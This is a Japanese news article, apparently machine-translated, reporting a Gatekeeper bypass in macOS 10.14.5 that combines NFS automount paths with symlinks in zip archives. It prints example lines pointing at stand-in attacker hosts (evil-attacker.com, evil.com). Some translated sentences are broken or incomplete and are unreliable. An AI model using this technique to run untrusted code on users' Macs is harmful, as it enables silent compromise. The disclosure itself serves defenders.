macOSのパッチが適用されていない脆弱性 10.14.5 モハベとしても知られている最近発見されました. この欠陥により、攻撃者はユーザーの操作を必要とせずに任意のコードを実行できる可能性があります, したがって、ゲートキーパーをバイパスします.
この発見は、セグメントの研究者フィリッポカヴァラリンから来ています, イタリアを拠点とするサイバーセキュリティ会社. 「「MacOSXバージョンの場合 <= 10.14.5 (at time of writing) it is possible to easily bypass Gatekeeper in order to execute untrusted code without any warning or user's explicit permission,」研究者は書いた.
ゲートキーパーバイパスはどのように可能ですか?
初め, 外付けドライブとネットワーク共有の両方を安全な場所として受け入れることは、ゲートキーパーの設計に基づいていることに注意してください。, 含まれているアプリを完璧に実行できるようにする. でも, macOSの2つの正当な機能をまとめることによって, ゲートキーパーとその「意図された動作」.
そう, これらの機能は何ですか? 1つ目は、「/ net /」で始まるパスを受け入れるだけで、ユーザーがネットワーク共有を自動的にマウントできるようにするものです。:
例えば
ls /net/evil-attacker.com/sharedfolder/
OSに'sharedfolderのコンテンツを読み取らせます’ リモートホスト上 (evil-attacker.com) NFSを使用する.
もう1つの機能は、任意の場所を指すシンボリックリンクを含むzipアーカイブに関するものです。. さらに, macOSでzipファイルを解凍するソフトウェアは、シンボリックリンクを作成する前にチェックを実行しません, 研究者は説明した.
攻撃はどのように機能しますか? 攻撃者は、自動マウントハッカーが制御するエンドポイントへのシンボリックリンクを含むzipファイルを作成する可能性があります (exドキュメント->/net/evil.com/Documents) 対象のシステムに送信できます. ユーザーは悪意のあるアーカイブをダウンロードします, 何も疑わずに悪意のあるファイルを抽出します.
これで、被害者は攻撃者によって制御されているが、ゲートキーパーによって信頼されている場所にいます。, そのため、攻撃者が制御する実行可能ファイルは警告なしに実行できます. Finderの設計方法 (exhidden.app拡張子, タイトルバーからフルパスを非表示) このテクニックを非常に効果的で見つけにくいものにします, 研究者は指摘した.
もあります ビデオデモンストレーション このゲートキーパーバイパスがどのように機能するか.
これは、macOS組み込み保護(別名)の最初のケースではありません. バイパスされているゲートキーパー. 今年の2月に, トレンドマイクロのセキュリティ研究者は、悪意のあるWindows.exeファイルがMacコンピュータに感染する可能性があることを発見しました, システムにアドウェアを伴うinfostealerマルウェアをダウンロードする可能性があります.
その場合, .exeファイルは、ソフトウェアによってチェックされなかったため、Gatekeeperの保護を回避できました。, ネイティブMacファイルのみをチェックするように設計されています. これにより、コード署名のチェックと検証がバイパスされる可能性があります.
ミレーナ・ディミトロワ
プロジェクトの開始以来SensorsTechForumに所属しているインスピレーションを得たライター兼コンテンツマネージャー. の専門家 10+ 魅力的なコンテンツの作成における長年の経験. ユーザーのプライバシーとマルウェア開発に焦点を当てています, 彼女はサイバーセキュリティが中心的な役割を果たす世界を強く信じています. 常識が意味をなさない場合, 彼女はメモを取るためにそこにいます. それらのメモは後で記事になる可能性があります! Milena@Milenyimをフォローする
フォローしてください: